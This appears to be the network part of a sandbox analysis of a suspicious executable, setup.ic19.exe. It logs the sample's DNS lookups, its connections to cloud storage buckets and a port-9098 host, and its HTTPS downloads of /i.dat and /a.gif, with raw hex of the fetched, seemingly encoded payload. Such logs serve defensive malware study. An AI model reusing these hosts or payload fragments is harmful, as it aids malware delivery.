Oct 2, 2024 04:28:53.456166029 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.461586952 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.461675882 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.464271069 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.464354038 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.467046976 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.467135906 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.472445965 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.472529888 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.475223064 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.475305080 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.480844021 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.480916977 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.483474970 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.483552933 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.486323118 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.486413002 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.491713047 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.491775990 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.494314909 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.494381905 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.499787092 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.499854088 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.502522945 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.502588034 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.508037090 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.508095026 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.510725975 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.510788918 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.513439894 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.513514042 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.518965960 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.519021988 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.521688938 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.521750927 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.527209997 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.527280092 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.529895067 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.529954910 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.532588959 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.532645941 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.538039923 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.538110018 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.540843010 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.540903091 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.546330929 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.546392918 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.679130077 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.679214954 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.680243015 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.680321932 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.682769060 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.682841063 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.688011885 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.688088894 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.690444946 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.690514088 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.695462942 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.695533991 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.698054075 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.698122025 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.700704098 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.700763941 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.705554962 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.705616951 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.708164930 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.708220959 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.708233118 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.708277941 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.709044933 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.709084034 CEST	443	49750	118.178.60.61	192.168.2.4
Oct 2, 2024 04:28:53.709109068 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:53.709147930 CEST	49750	443	192.168.2.4	118.178.60.61
Oct 2, 2024 04:28:58.726850986 CEST	49752	9098	192.168.2.4	47.76.31.57
Oct 2, 2024 04:28:58.731801987 CEST	9098	49752	47.76.31.57	192.168.2.4
Oct 2, 2024 04:28:58.731874943 CEST	49752	9098	192.168.2.4	47.76.31.57
Oct 2, 2024 04:28:59.059602976 CEST	49752	9098	192.168.2.4	47.76.31.57
Oct 2, 2024 04:28:59.065115929 CEST	9098	49752	47.76.31.57	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 04:27:18.131839037 CEST	64026	53	192.168.2.4	1.1.1.1
Oct 2, 2024 04:27:18.729851007 CEST	53	64026	1.1.1.1	192.168.2.4
Oct 2, 2024 04:28:13.373718023 CEST	51618	53	192.168.2.4	1.1.1.1
Oct 2, 2024 04:28:14.036072016 CEST	53	51618	1.1.1.1	192.168.2.4
Oct 2, 2024 04:28:57.804256916 CEST	61929	53	192.168.2.4	1.1.1.1
Oct 2, 2024 04:28:57.813657999 CEST	53	61929	1.1.1.1	192.168.2.4
Oct 2, 2024 04:29:03.847006083 CEST	65434	53	192.168.2.4	1.1.1.1
Oct 2, 2024 04:29:03.855948925 CEST	53	65434	1.1.1.1	192.168.2.4
Oct 2, 2024 04:29:09.878092051 CEST	64180	53	192.168.2.4	1.1.1.1
Oct 2, 2024 04:29:09.906673908 CEST	53	64180	1.1.1.1	192.168.2.4
Oct 2, 2024 04:29:15.925167084 CEST	49208	53	192.168.2.4	1.1.1.1
Oct 2, 2024 04:29:15.935831070 CEST	53	49208	1.1.1.1	192.168.2.4
Oct 2, 2024 04:29:21.956633091 CEST	54765	53	192.168.2.4	1.1.1.1
Oct 2, 2024 04:29:22.763926029 CEST	53	54765	1.1.1.1	192.168.2.4
Oct 2, 2024 04:29:28.941618919 CEST	63213	53	192.168.2.4	1.1.1.1
Oct 2, 2024 04:29:28.951308012 CEST	53	63213	1.1.1.1	192.168.2.4
Oct 2, 2024 04:29:34.976635933 CEST	56366	53	192.168.2.4	1.1.1.1
Oct 2, 2024 04:29:34.995218992 CEST	53	56366	1.1.1.1	192.168.2.4
Oct 2, 2024 04:29:40.143953085 CEST	49807	53	192.168.2.4	1.1.1.1
Oct 2, 2024 04:29:40.273082972 CEST	53	49807	1.1.1.1	192.168.2.4
Oct 2, 2024 04:29:46.222053051 CEST	60211	53	192.168.2.4	1.1.1.1
Oct 2, 2024 04:29:46.239331961 CEST	53	60211	1.1.1.1	192.168.2.4
Oct 2, 2024 04:29:51.753231049 CEST	58745	53	192.168.2.4	1.1.1.1
Oct 2, 2024 04:29:51.762135983 CEST	53	58745	1.1.1.1	192.168.2.4
Oct 2, 2024 04:29:56.237701893 CEST	59216	53	192.168.2.4	1.1.1.1
Oct 2, 2024 04:29:56.247503996 CEST	53	59216	1.1.1.1	192.168.2.4
Oct 2, 2024 04:30:01.002090931 CEST	57970	53	192.168.2.4	1.1.1.1
Oct 2, 2024 04:30:01.011615992 CEST	53	57970	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 2, 2024 04:27:18.131839037 CEST	192.168.2.4	1.1.1.1	0x27c5	Standard query (0)	101oss.oss-cn-beijing.aliyuncs.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:28:13.373718023 CEST	192.168.2.4	1.1.1.1	0x1f5c	Standard query (0)	10mm.oss-cn-hangzhou.aliyuncs.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:28:57.804256916 CEST	192.168.2.4	1.1.1.1	0x5b9a	Standard query (0)	hteyov.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:03.847006083 CEST	192.168.2.4	1.1.1.1	0xd198	Standard query (0)	hteyov.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:09.878092051 CEST	192.168.2.4	1.1.1.1	0x12f0	Standard query (0)	hteyov.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:15.925167084 CEST	192.168.2.4	1.1.1.1	0xe942	Standard query (0)	hteyov.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:21.956633091 CEST	192.168.2.4	1.1.1.1	0xe80c	Standard query (0)	hteyov.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:28.941618919 CEST	192.168.2.4	1.1.1.1	0x4d59	Standard query (0)	hteyov.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:34.976635933 CEST	192.168.2.4	1.1.1.1	0xec9b	Standard query (0)	hteyov.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:40.143953085 CEST	192.168.2.4	1.1.1.1	0x4fe7	Standard query (0)	hteyov.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:46.222053051 CEST	192.168.2.4	1.1.1.1	0xf70b	Standard query (0)	hteyov.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:51.753231049 CEST	192.168.2.4	1.1.1.1	0xb87d	Standard query (0)	hteyov.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:56.237701893 CEST	192.168.2.4	1.1.1.1	0xd781	Standard query (0)	hteyov.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:30:01.002090931 CEST	192.168.2.4	1.1.1.1	0x15d1	Standard query (0)	hteyov.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 2, 2024 04:27:18.729851007 CEST	1.1.1.1	192.168.2.4	0x27c5	No error (0)	101oss.oss-cn-beijing.aliyuncs.com	sc-2ikp.cn-beijing.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 04:27:18.729851007 CEST	1.1.1.1	192.168.2.4	0x27c5	No error (0)	sc-2ikp.cn-beijing.oss-adns.aliyuncs.com	sc-2ikp.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 04:27:18.729851007 CEST	1.1.1.1	192.168.2.4	0x27c5	No error (0)	sc-2ikp.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com		39.103.20.76	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:28:14.036072016 CEST	1.1.1.1	192.168.2.4	0x1f5c	No error (0)	10mm.oss-cn-hangzhou.aliyuncs.com	sc-2w7a.cn-hangzhou.oss-adns.aliyuncs.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 04:28:14.036072016 CEST	1.1.1.1	192.168.2.4	0x1f5c	No error (0)	sc-2w7a.cn-hangzhou.oss-adns.aliyuncs.com	sc-2w7a.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 04:28:14.036072016 CEST	1.1.1.1	192.168.2.4	0x1f5c	No error (0)	sc-2w7a.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com		118.178.60.61	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:28:57.813657999 CEST	1.1.1.1	192.168.2.4	0x5b9a	Name error (3)	hteyov.net	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:03.855948925 CEST	1.1.1.1	192.168.2.4	0xd198	Name error (3)	hteyov.net	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:09.906673908 CEST	1.1.1.1	192.168.2.4	0x12f0	Name error (3)	hteyov.net	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:15.935831070 CEST	1.1.1.1	192.168.2.4	0xe942	Name error (3)	hteyov.net	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:22.763926029 CEST	1.1.1.1	192.168.2.4	0xe80c	Name error (3)	hteyov.net	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:28.951308012 CEST	1.1.1.1	192.168.2.4	0x4d59	Name error (3)	hteyov.net	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:34.995218992 CEST	1.1.1.1	192.168.2.4	0xec9b	Name error (3)	hteyov.net	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:40.273082972 CEST	1.1.1.1	192.168.2.4	0x4fe7	Name error (3)	hteyov.net	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:46.239331961 CEST	1.1.1.1	192.168.2.4	0xf70b	Name error (3)	hteyov.net	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:51.762135983 CEST	1.1.1.1	192.168.2.4	0xb87d	Name error (3)	hteyov.net	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:29:56.247503996 CEST	1.1.1.1	192.168.2.4	0xd781	Name error (3)	hteyov.net	none	none	A (IP address)	IN (0x0001)	false
Oct 2, 2024 04:30:01.011615992 CEST	1.1.1.1	192.168.2.4	0x15d1	Name error (3)	hteyov.net	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

101oss.oss-cn-beijing.aliyuncs.com

10mm.oss-cn-hangzhou.aliyuncs.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	39.103.20.76	443	6876	C:\Users\user\Desktop\setup.ic19.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 02:27:20 UTC	111	OUT	GET /i.dat HTTP/1.1 User-Agent: GetData Host: 101oss.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2024-10-02 02:27:20 UTC	558	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 02 Oct 2024 02:27:20 GMT Content-Type: application/octet-stream Content-Length: 512 Connection: close x-oss-request-id: 66FCAF880AD071313456FF88 Accept-Ranges: bytes ETag: "699393BAABBB9ADBE93FAC039FB9E84D" Last-Modified: Mon, 30 Sep 2024 05:54:59 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 16803529958108904185 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: aZOTuqu7mtvpP6wDn7noTQ== x-oss-server-time: 1
2024-10-02 02:27:20 UTC	512	IN	Data Raw: 07 1b 1b 1f 6c 25 30 30 01 00 01 5f 2c 2c 71 30 43 43 1d 53 3d 7e 31 36 5f 5c 5f 58 3f 76 39 34 5d 4d 41 5a 39 29 74 39 56 54 16 58 76 3f 31 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 56 4a 4a 4e 3d 74 61 61 50 51 50 0e 7d 7d 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 02 03 02 5c 2f 2f 72 33 40 40 1e 50 3e 7d 32 35 5c 5f 5c 5b 3c 75 3a 37 5e 4e 42 59 3a 2a 77 3a 55 57 15 59 77 3e 30 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 3f 57 4b 4b 4f 3c 75 60 60 51 50 51 0f 7c 7c 21 Data Ascii: l%00_,,q0CCS=~16_\_X?v94]MAZ9)t9VTXv?1>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>VJJN=taaPQP}} aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33\//r3@@P>}25\_\[<u:7^NBY:*w:UWYw>0?????????????????????????????????WKKO<u``QPQ\|\|!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49736	39.103.20.76	443	6876	C:\Users\user\Desktop\setup.ic19.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 02:27:22 UTC	111	OUT	GET /a.gif HTTP/1.1 User-Agent: GetData Host: 101oss.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2024-10-02 02:27:22 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 02 Oct 2024 02:27:22 GMT Content-Type: image/gif Content-Length: 138173 Connection: close x-oss-request-id: 66FCAF8A5DFDD13139EEC86D Accept-Ranges: bytes ETag: "EAF4031D2DF6F6A720782A9C2E8AE85D" Last-Modified: Mon, 30 Sep 2024 05:41:40 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 18311653462792630573 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 6vQDHS329qcgeCqcLoroXQ== x-oss-server-time: 38
2024-10-02 02:27:22 UTC	3549	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2024-10-02 02:27:22 UTC	4096	IN	Data Raw: 8e 83 84 6e ba 04 72 85 fe 9e 0f 77 81 fb 80 12 68 81 9b 10 05 97 98 99 20 1b 97 9d 9e 74 82 e0 65 a3 89 b7 a6 a7 41 29 aa ab ac 2e 54 a5 c5 b6 08 5e bb b5 b6 5c b2 3a 40 b5 c9 9a 04 b5 cc c1 c2 8b 4f c0 65 12 c9 c9 8b 72 c8 cc ce cf 9d 5a 10 9b 5f 9d de 9f 51 95 fe fb ef 14 36 13 8f e1 e2 08 ac 66 1c eb 9c f8 69 11 e3 99 e2 6c 0a e3 87 ca 4e 55 f9 f7 f8 12 32 ba 3b fd 1b f0 00 01 e9 2a 87 ff 08 72 0f b3 01 07 0c 0d e5 bc 93 eb 1e 67 05 96 ec 18 6c 15 99 e1 0e 68 10 a5 c6 2a 22 23 cf b8 67 e0 28 ad 21 2b 2c 95 2f 2f 30 31 7a b0 f0 0d f5 fb f4 71 69 73 bf d1 1e 77 cb 98 0a c8 0d 4d 0e c2 81 3d 5d 03 b3 84 c4 4e d4 91 26 5a 68 aa 22 52 d8 58 a5 b0 59 b5 2d 30 60 61 2a a4 27 6d 66 67 68 69 22 ac 2f 7d 6e 6f 70 71 3a b4 37 6d 76 77 78 79 32 f8 b8 5d 25 bc 4c Data Ascii: nrwh teA).T^\:@OerZ_Q6filNU2;rglh"#g(!+,//01zqiswM=]N&Zh"RXY-0`a*'mfghi"/}nopq:7mvwxy2]%L
2024-10-02 02:27:22 UTC	4096	IN	Data Raw: 98 03 bd 8f f8 8d 08 b0 87 ff 89 0d b7 af e5 9a 6d 86 11 a8 97 97 d0 10 9d 70 42 d5 15 4a e8 2a 6d 4b 29 58 59 58 2d 69 21 73 d4 be e6 24 66 f9 39 7c 5c c9 4b 48 47 3c 7a 30 64 c5 bc 8c 1b 89 49 0e 2c 39 b9 c7 c8 42 09 83 4f 09 e6 90 8e 8c 89 10 18 9d 53 1e 90 52 0b ae df ee 1e 1c 86 62 d8 e3 a8 6e 24 93 c7 ac e5 5c e4 a4 63 af f2 97 b7 76 3d b9 f9 b2 38 9f bb 78 05 a1 8a f1 66 40 81 fa 2b 71 01 61 49 8a f3 31 79 0e 47 84 d8 77 53 90 2c 15 63 c6 50 32 d0 53 cd e4 95 de e3 69 ab 6f 00 2d 75 71 7f 61 a9 c7 0c 65 a5 f6 03 ce 7a 08 fb 40 3c 8f 6f 39 3d bb d5 7b 3f 3f 40 09 cb 12 64 09 cf 06 58 05 c3 0a 54 01 c7 0e 58 d8 2b 7b 1c dc 2f 67 10 da 9b 63 a3 48 85 66 61 61 f2 2b e9 2e 06 98 7d b9 53 6a 6c fd 26 e2 fb f9 72 73 74 8a 63 b5 41 78 7a eb 34 f4 c5 c7 80 Data Ascii: mpBJ*mK)XYX-i!s$f9\|\KHG<z0dI,9BOSRbn$\cv=8xf@+qaI1yGwS,cP2Sio-uqaez@<o9={??@dXTX+{/gcHfaa+.}Sjl&rstcAxz4
2024-10-02 02:27:22 UTC	4096	IN	Data Raw: 82 83 84 85 41 c3 ac a9 8a 8b 8c 8d 71 9a 19 bb 93 93 19 d1 96 95 d0 fa 52 12 d8 b9 ba 60 b5 c9 8c a2 a4 ed 23 67 e0 20 ee 8f 84 d8 a9 9c 79 58 9a b2 b4 b5 fe 3e a7 39 81 bb f4 36 a9 b0 44 c7 c3 c3 c4 45 fc e2 c7 4c 0d cb cc cd 86 44 1a 2e c7 95 f9 d4 d6 9f 51 de 92 50 04 5d e6 fa 95 cd aa 6e a8 c1 c6 af 63 39 02 99 07 12 11 6a 30 fe 77 5f f4 f5 f6 4c f6 f9 fd 7b b4 76 b2 db 28 fe 17 15 2a 04 06 8c cb e0 fc 0b 0c 0d 46 8a d0 1e 96 b3 14 15 16 9d 18 9d da 14 98 8b 1e 1f 20 1d 07 57 2a 6d ad ec d7 3c c5 07 2d 2d 66 a4 e8 da d6 7b b1 ee 42 48 7c b2 f9 7f 17 3a 7f bc b8 5e 3d 3e 0c ce 51 0f c5 05 6e 7b 0d b2 8e b0 45 29 79 52 54 1d dd 18 50 11 d7 0f 78 6d b6 d5 96 9e 9d 2b e1 a5 12 28 20 e4 26 4f 4c 25 e5 bf 98 9d 85 8c 8b f0 b6 78 fc 03 85 84 83 35 47 60 f4 Data Ascii: AqR`#g yX>96DELD.QP]nc9j0w_L{v(F Wm<--f{BH\|:^=>Qn{E)yRTPxm+( &OL%x5G`
2024-10-02 02:27:22 UTC	4096	IN	Data Raw: a0 82 84 cd 0d 4f 77 9c dd 97 8d 8d c6 0a 50 e5 8f db 1f d9 b2 ef 13 c8 8e 12 c8 b9 be db 2b e8 b2 e7 ab 12 e7 bd a7 1e fb b3 53 7d 25 57 f8 3a 79 4c a1 b9 aa b6 b8 f1 31 f7 98 cd f6 34 c1 89 49 97 e0 bd 39 97 a8 59 82 40 80 e9 be 87 55 18 a6 d4 9c 5e d7 28 88 c9 4a 93 57 91 fa ef 1f f4 5d ff e5 e5 6d 20 a0 6a 2e a3 b3 b6 2d 23 3c 3d 3e 3f 38 39 3a 3b 34 35 36 37 30 b5 ab b7 83 ed 22 4b 8f ef 4e 8a 45 39 e2 7d d5 f2 f1 47 93 d5 32 4e d7 d9 da db d4 d5 d6 d7 d0 55 4b 57 a3 cd 02 6b af cf 6e aa 65 59 c2 dd ce d2 d1 67 b3 f5 12 6e f7 7d 61 7f b9 d5 5a 39 3c 3d 76 f8 04 65 72 bd bb ba b9 0f c3 4c d5 c5 4d 4d 06 c6 d4 75 02 51 54 55 1e 90 1c 7d 7a 5b 5c 5d 5e 17 a7 25 46 4b 64 65 66 67 24 e4 26 4f 44 21 e3 2b 54 51 9a cd 8e 8a 89 fc 80 fc ba 03 04 35 f5 33 a4 Data Ascii: OwP+S}%W:yL14I9Y@U^(JW]m j.-#<=>?89:;45670"KNE9}G2NUKWkneYgn}aZ9<=verLMMuQTU}z[\]^%FKdefg$&OD!+TQ53
2024-10-02 02:27:22 UTC	4096	IN	Data Raw: fe a7 a4 c4 3f 78 77 76 75 c6 07 49 bd 5d a3 58 6d 86 e1 9f 97 97 1d 59 ee 92 77 9f ad 60 e8 24 5d d6 b8 ed 23 7c dc b9 e2 20 67 e5 25 b4 58 a1 e2 b3 b4 fd 33 6c cd 49 02 b5 bc ba 3e 54 f3 84 cd 74 01 02 82 e3 e8 c9 ca cb cc 81 45 00 99 5a 04 9a 5f 1a 3e 4d 22 26 25 50 24 95 5b 04 94 f1 aa 68 2f ad 6d fc 00 31 a5 eb ec a5 6b 34 85 01 79 34 bc 7e bb e7 10 81 17 fb fc b5 73 9a 28 40 5d 42 5a 44 5b 46 54 56 54 50 51 ce c2 c3 dc dd de df d8 d9 da db d4 d5 d6 d7 d0 55 4b 57 a3 cd 02 6b a9 4f 66 6f a5 64 2a c3 9d ff d1 d0 78 b2 f6 13 69 f6 fa fb f4 71 6f 68 6a 6a 7f 6b 01 14 03 15 05 12 0e c6 a4 e1 4f 4b 4c 05 c3 23 74 61 1a 94 11 75 a8 a8 a7 a6 12 d0 59 d1 20 5e 60 29 eb e6 04 60 66 67 21 e2 9b 2e e7 95 2a e4 82 34 41 9e 3d fe ab 3b f1 14 62 3f f5 10 76 b8 c5 Data Ascii: ?xwvuI]XmYw`$]#\| g%X3lI>TtEZ_>M"&%P$[h/m1k4y4~s(@]BZD[FTVTPQUKWkOfodxiqohjjkOKL#tauY ^`)`fg!.4A=;b?v
2024-10-02 02:27:22 UTC	4096	IN	Data Raw: 2d 7c 7b c0 b5 4e bb 5b cb 06 f5 e9 c6 04 5b d9 55 d7 b0 b5 96 97 98 99 de 10 5b 75 11 61 5f 5e ee 28 b9 61 23 a6 a8 ed 27 e4 00 e4 25 ec b8 f5 3f f4 29 0f 9f 94 b8 b9 f2 32 f8 99 96 8c 09 85 4b 8f e0 e5 2e 37 d7 c9 ca 46 9b 50 8a 44 17 9d 59 1b 9c 58 92 f3 b8 91 51 10 94 54 9a fb c0 09 a9 1d 1b 1a 0d f3 a0 62 a1 e3 a9 de 27 aa c3 31 b3 7e a5 f7 09 e2 41 04 fa fb b4 76 72 db 70 00 02 03 ec 69 db 07 08 41 8b cf 84 0c 0e 0f 4f 4a d1 df d8 5d 95 fb 20 5c 29 d2 54 da 5a 3b 00 21 22 23 24 64 ab 76 2a 6c a7 6a 48 c5 d1 d2 cf ce 7a b0 f0 0d f5 fb f4 71 69 6c 74 be d2 17 08 ca 9b 0b cf 0c 5e 0f cd 80 3e 45 b3 58 0d b2 50 51 1a 94 17 4d 56 57 58 59 12 d0 27 05 16 da 9f 15 7a 2b ef aa 8e 6d 64 69 6a 23 e7 a2 86 0d 6f 71 72 3b b3 36 2e 77 78 79 7a 33 ff b9 56 20 db Data Ascii: -\|{N[[U[ua_^(a#'%?)2K.7FPDYXQTb'1~AvrpiAOJ] \)TZ;!"#$dv*ljHzqilt^>EXPQMVWXY'z+mdij#oqr;6.wxyz3V
